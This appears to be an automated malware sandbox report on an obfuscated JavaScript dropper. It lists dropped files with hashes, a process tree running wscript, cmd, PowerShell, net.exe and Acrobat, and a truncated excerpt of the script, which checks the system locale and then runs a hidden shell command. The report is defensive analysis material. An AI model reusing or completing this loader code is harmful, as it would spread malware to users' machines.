MD5: | 9D95A009DE6DADFEC6F570D82B19DFBF |
SHA1: | 51DE23B929B8E3ADD6FAF30E619072C9DC06AE4D |
SHA-256: | 90C6475C8256840CD679D44346EF8FB916B447E6FE76ECACDFDD7CC792B7E286 |
SHA-512: | 3A20C87F6378B8C72976461506B619E7E6CC978AD20DD04B693166535A0D78184D629260C32224173F947E3AD9DFB93D232740CE0C207A55FD12599D27145A9F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.235447459435858 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJfshHHrPeUkwRe9:YvXKX7Chh0cwWfnGUUUkee9 |
MD5: | 90C08819994F5D292CA5E7F1A393F8C1 |
SHA1: | DE60B09CE0A9076826EC3192323181D55C4801BF |
SHA-256: | 2F1562E514D4E0CFF0E1B1EC512B1EE3175B28B75545AFCE898DD6E6ADB61E87 |
SHA-512: | 1CCDBBD5722DF221464DF45D91EF7A81A3798B6E94D7B0395B24E63FBC29CB956B287A883901840EB4FCCEEBF829149430D5D8239E2BE36862593AAD8F6A0FC8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.243944867170528 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX7qrGURhn0nZiQ0YDWf8DoAvJTqgFCrPeUkwRe9:YvXKX7Chh0cwWfnGTq16Ukee9 |
MD5: | 8396D8DCAB13E853C6B250ECF48FD692 |
SHA1: | F1DDE477070643104C509A0C6A67BD2E01B3EEF4 |
SHA-256: | 651B217C40C9A3227B56ACF58AB315EA5D1619DAAB50C1A150D3C7910B2E38D2 |
SHA-512: | A0BFA3A45F2AA7CDE54C431F7C9D0340D13C43A971662F8EC24A19FE4BF822B6FCA8EA9053B75C01EE4F09558C277F765A95E207229730F8B1063BFF026A4CAE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.1383464474968505 |
Encrypted: | false |
SSDEEP: | 24:Ydc0HaAHpBayHDM6XZ9xIMA1jrj0SnYTTD24RID2LS5CFMEuVKaKkde05FDz9eJu:YaUHpbD9/UHszEDbZENa7XnP9D |
MD5: | 5F8588F1FF00CE8BFA511B82CC77390A |
SHA1: | 33017FB1A43D15C9C547F084BD7433AF98EF7C75 |
SHA-256: | 3A42AB48EF64617BBE29756C3A23456234C5D98D96387E7080F569C1368FE7F5 |
SHA-512: | 28167869EDCBDBFCC68EC23343A94C05E256FD4771E519A28C27088CB678A3C0969963AF88B5C73877299A87EB89C021A1CECEB9EA341200BBA25DBFE62D9CE7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1465732977372032 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursWj0RZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUud7:TFl2GL7msWyXc+XcGNFlRYIX2v3k3k |
MD5: | 2EF9EBBECAD995EBA0497A6044B38CF5 |
SHA1: | 8630029CC0F1DE2C030F122FF669F4E6AF89C3D4 |
SHA-256: | 2E04290F4AB3F8CDAE0258F3E916C695FB56F276491B1981853DF016256174E5 |
SHA-512: | 7A19AD5D108F33A452F636C2B517E033169F151512DE29B7083DAAACE3880CE3EA11FC7B33F0589347C71AFD267F00AB7FA95793AF71E9EA9A95C21F62976D52 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5534895952730554 |
Encrypted: | false |
SSDEEP: | 24:7+tij0UXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxOqLxx/XYW:7MiNXc+XcGNFlRYIX2vTqVl2GL7msv |
MD5: | BCA90EEFD25A89853F06AFBE15795C76 |
SHA1: | 90126D42BBC70207768BA83D04487271BC2CC7E3 |
SHA-256: | 864FB76A93A31B7FFD17855DBDE657181C64F15A5445DD450A5FD8384BFA69C6 |
SHA-512: | 08A58AB2AF479F79FE0F638194C42CAC2E3ADA1E37E135D72B9B2DCEC59B57C3285C7B51AD11C5F3561C9B032EBCF73FDD748C847ACDED01549426669023E58F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgiC7IzAb2li0VatX8ulNmW48Yyu:6a6TZ44ADEiCUi2I0wp8+zK |
MD5: | AD51B15872A91E100E30F4E655B3A9CA |
SHA1: | 5D5C5BBC862A5258E2E8F164027EB19BA3EB6431 |
SHA-256: | D8231C28FE22E3C087557C39BA5BD31E45DAD4AE1D199DD7F99FDDD642E42ABC |
SHA-512: | 6896FCB3756A4632B37C0F2519CDB84945A685F29DB16F3BF53EA6AB4C4DB49F5DE1426BAD4DB86957149B54A980E793BDA63723DC6B7F078A460CC245E89F21 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllulbnolz:NllUc |
MD5: | F23953D4A58E404FCB67ADD0C45EB27A |
SHA1: | 2D75B5CACF2916C66E440F19F6B3B21DFD289340 |
SHA-256: | 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B |
SHA-512: | B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4965336456103326 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClqlUKlYH:Qw946cPbiOxDlbYnuRK+bM+YH |
MD5: | F60B03A5788FFA0F5B79EFAD3AFEA147 |
SHA1: | E5819C7130322E2897D3F88ED032EC8995A3DB50 |
SHA-256: | 91430CD3EF13B951DA09C80FF551366DC165D1F28512B233227B0233BFED63CD |
SHA-512: | 1B3CACA99BCFDCF1E149D7A8372D1860115FBED65B5F6B336F3F1B9A103DCCBCC072FDAF3BA8F6D36E0EAE7888ACD254BE61DDB5126B2701264AE84A6A368EF2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 08-51-15-617.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.348808107800975 |
Encrypted: | false |
SSDEEP: | 384:p/ZShrIjLAxHwPpYUr3i2VonkhhjUsEDXkKlvXV/g5epCmvvPsh6ZSZ09hLMOZ5V:Zf6 |
MD5: | 01A1FBDD7893BEA9A6C5CDDD29A36C3E |
SHA1: | 3E3F3048DE0108DB8852965DCAD7214CFBCAB475 |
SHA-256: | DFE97C17DE8FC3C8035A46D314A7E7C29931BE5759556FE3EB26530047BCD98B |
SHA-512: | 92DDD6669CC812D01669345286B1E705A3846BC54A438855D3F03BB279B1537616F22F6622E171D7F212443845A289B9ADC3EBE7F67F430BD35DB4FECD45DB9A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.395962827288833 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbTOcbsIC8cbl:V3fOCIdJDeRdCn |
MD5: | 1AD8BC4617A527815E78F65CC242F58C |
SHA1: | D9155C74E14A123AA8C9534442977D3369D2C9EE |
SHA-256: | E87638F2A25071687A14271626E89899BD80379ABE20919309EA7456D6AD52F4 |
SHA-512: | 51BEBABF4CA657F21CB347E85B06E177813C9512DE7FA109A7179457E98AEE281D12CC7FD23543C00CFC1FBE4132CF75B4511642C9B4141FDD79E685AA40C858 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru |
MD5: | CA6B0D9F8DDC295DACE8157B69CA7CF6 |
SHA1: | 6299B4A49AB28786E7BF75E1481D8011E6022AF4 |
SHA-256: | A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7 |
SHA-512: | 9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.917320972632268 |
TrID: | |
File name: | 18474255912080825433.js |
File size: | 18'848 bytes |
MD5: | 5319f3a96ef552abecb6f43b1a011563 |
SHA1: | d25bb3659112eadd043083c230be4665453a25e1 |
SHA256: | 32bdd1a8e95109f21b5f24f48ba302721271e6438d5ead0de9c45951cae99e45 |
SHA512: | 3ee1ec0e4652fad530315d0711f9a8b8f6000bd9a35ecb52c51acaad1ccbda08680a3b5a6f7df3dc9e3f9782129c8e0754f1a941fbbf1ecd26e0b8fabb7d4da3 |
SSDEEP: | 384:HJ3lw3UF+pFloFo+RGlq0Ml9UyB4AeZU2Xq1NvDTxYgJaJVeFOKHHP46lmPfkEnL:moGU0MYPnhVtyy |
TLSH: | 76825401E911E91F1AD4B631C37B16D5238EF11B8BC80A565E9940C7670196CEBCFDBB |
File Content Preview: | function zxqjytm(){sgvpv=[1031,3079,5127,4103,2055,3072];var bemzvxq=this[vhhrsnees+zkffxio+lwkgztd+guhmf+pzgacr+krpeeutzy+lflgc+lownhv](this[zocsuf+joyrrety+wuoye+lwkgztd+usyote+vhhrsnees+lownhv][vgeet+lwkgztd+pzgacr+zkffxio+lownhv+pzgacr+jqdbbamo+uapijk |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 08:50:59 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7bb130000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 08:50:59 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d08e0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 08:50:59 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 08:50:59 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 08:51:12 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 08:51:12 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d08e0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 08:51:12 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff68a930000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 08:51:13 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 08:51:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 08:51:13 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function zxqjytm() { |
|
1 | sgvpv = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var bemzvxq = this[vhhrsnees + zkffxio + lwkgztd + guhmf + pzgacr + krpeeutzy + lflgc + lownhv] ( this[zocsuf + joyrrety + wuoye + lwkgztd + usyote + vhhrsnees + lownhv][vgeet + lwkgztd + pzgacr + zkffxio + lownhv + pzgacr + jqdbbamo + uapijkoc + orhkocpn + pzgacr + wuoye + lownhv] ( zocsuf + joyrrety + wuoye + lwkgztd + usyote + vhhrsnees + lownhv + gaafnalvh + joyrrety + qqiccpyam + pzgacr + dowiao + dowiao ) [gnwheuymv + pzgacr + xiftdym + gnwheuymv + pzgacr + zkffxio + qhflhoadj] ( vivmabb + vsynel + ykzmjakw + eifip + pcdikm + vgeet + cromdiwup + gnwheuymv + gnwheuymv + ykzmjakw + bktyujfm + fgrxiafp + pcdikm + cromdiwup + joyrrety + ykzmjakw + gnwheuymv + nmlhinbkr + vgeet + alpxvaw + lflgc + lownhv + lwkgztd + alpxvaw + dowiao + mqifz + yjxhigm + zkffxio + lflgc + pzgacr + dowiao + nmlhinbkr + krpeeutzy + lflgc + lownhv + pzgacr + lwkgztd + lflgc + zkffxio + lownhv + usyote + alpxvaw + lflgc + zkffxio + dowiao + nmlhinbkr + ntsceb + alpxvaw + wuoye + zkffxio + dowiao + pzgacr ), 16 ); |
|
3 | for ( zdlde = 0 ; zdlde < sgvpv[dowiao + pzgacr + lflgc + xiftdym + lownhv + qqiccpyam] ; ++ zdlde ) | |
4 | { | |
5 | if ( bemzvxq == sgvpv[zdlde] ) | |
6 | { | |
7 | bemzvxq = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( bemzvxq !== true ) | |
12 | this[zocsuf + joyrrety + wuoye + lwkgztd + usyote + vhhrsnees + lownhv][shrqag + jszhfaofa + usyote + lownhv] ( ); | |
13 | this[zocsuf + joyrrety + wuoye + lwkgztd + usyote + vhhrsnees + lownhv][vgeet + lwkgztd + pzgacr + zkffxio + lownhv + pzgacr + jqdbbamo + uapijkoc + orhkocpn + pzgacr + wuoye + lownhv] ( zocsuf + joyrrety + wuoye + lwkgztd + usyote + vhhrsnees + lownhv + gaafnalvh + joyrrety + qqiccpyam + pzgacr + dowiao + dowiao ) [lwkgztd + jszhfaofa + lflgc] ( wuoye + gctllc + qhflhoadj + mqifz + kfxhzojuo + wuoye + mqifz + vhhrsnees + alpxvaw + ndiaggrdd + pzgacr + lwkgztd + guhmf + qqiccpyam + pzgacr + dowiao + dowiao + gaafnalvh + pzgacr + mzhkq + pzgacr + mqifz + vjqymhl + vgeet + alpxvaw + gctllc + gctllc + zkffxio + lflgc + qhflhoadj + mqifz + xsskv + krpeeutzy + lflgc + fcvlw + alpxvaw + awbwovs + pzgacr + vjqymhl + zocsuf + pzgacr + uapijkoc + gnwheuymv + pzgacr + pbxjqgo + jszhfaofa + pzgacr + guhmf + lownhv + 